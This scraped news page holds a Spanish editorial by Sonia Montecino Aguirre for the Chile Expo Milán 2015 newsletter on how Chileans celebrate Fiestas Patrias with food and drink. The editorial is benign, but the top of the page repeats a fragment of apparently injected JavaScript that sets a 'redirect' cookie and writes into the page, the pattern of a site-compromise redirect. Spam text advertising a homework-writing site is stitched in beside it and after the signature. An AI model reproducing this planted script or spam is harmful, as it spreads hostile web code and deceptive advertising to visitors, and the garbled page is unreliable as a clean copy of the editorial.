=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} In justdomyhomework.com the history of science from harvard university" /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} In justdomyhomework.com the history of science from harvard university" />

Noticias

EDITORIAL SONIA MONTECINO AGUIRRE, NEWSLETTER EXPO MILÁN 2015

18 Nov 2014

Compartir:

Septiembre para los(as) chilenos(as) es sinónimo de fiesta, de conjunción de primavera y memoria histórica, de recuerdos anudados a las experiencias de las identidades construidas con la configuración del estado nacional: el paso de la dependencia colonial a la república (sin olvidar los oscuros avatares del quiebre de la democracia que el mismo mes restituye). Las formas de conmemorar el nacimiento republicano se anclan, desde hace dos siglos, en la celebración gozosa de la comunidad reunida en torno al baile, el canto, los juegos, y la comida. Las celebraciones de las Fiestas Patrias o del "18" convocan casi en un ritual a la diversidad de grupos sociales que conforman Chile en torno a la afirmación de un "nosotros" y, al mismo tiempo, a la transgresión del cotidiano que supone toda fiesta colectiva. Un protocolo institucionalizado, que va desde un Tedeum ecuménico, una gala musical y una Parada Militar, unido a las denominadas "fondas" o "ramadas" , son el escenario público de los festejos.

A lo largo del norte, el centro y el sur del país y ya sea en espacios públicos o privados, los actos festivos se ven, asimismo, teñidos de un ceremonial culinario que despliega el lenguaje rural, urbano, cordillerano o costero de sus recetas y productos. Las cazuelas de ave, en sus particularidades locales, dibujan el semblante campesino-mestizo, pero sobre todo serán los asados de diversas carnes los símbolos del dispendio, del sacrificio (gasto festivo); se trata de la exo cocina, cuya función es la verificación de las identidades colectivas: en torno al fuego y la repartición de la comida se van hilvanando las pertenencias. El consumo de carne asada atraviesa las clases y las distinciones étnicas haciendo de su preparación un momento en el cual la "chilenidad" se hace performance y discurso.

Unido a ello las bebidas que "levantan el espíritu" acompañan secularmente las celebraciones con sus debidos excesos y transgresiones: vinos, chichas y "terremotos" se alían para que, como en el mundo al revés, se desvanezcan las diferencias. El comer y brindar colectivos son los actos sociales que permiten soldarlas y hacer del pasado común una experiencia que se actualiza en el cuerpo y en el bullicio de las multitudes que visitan las ramadas. Finalizadas las fiestas de septiembre el país retorna a la rutina, las alegres andanzas por las cocinas, sus ollas deleitosas y sus parrillas desperdigadas por el territorio, pasan a ser motivo de comentarios y de buenos o malos recuerdos. Así transcurrirá el ciclo de la existencia hasta esperar un nuevo renacer de los brotes de los árboles, un nuevo Septiembre en que la memoria se vuelva ceremonia y los destellos de la república se abran con su promesa de vida compartida.

Sonia Montecino Aguirre
Profesora Titular
Departamento de Antropología – Universidad de Chile
Representante Consejo Cultural
Chile Expo Milán 2015 In justdomyhomework.com the history of science from harvard university

Partners

Media Partner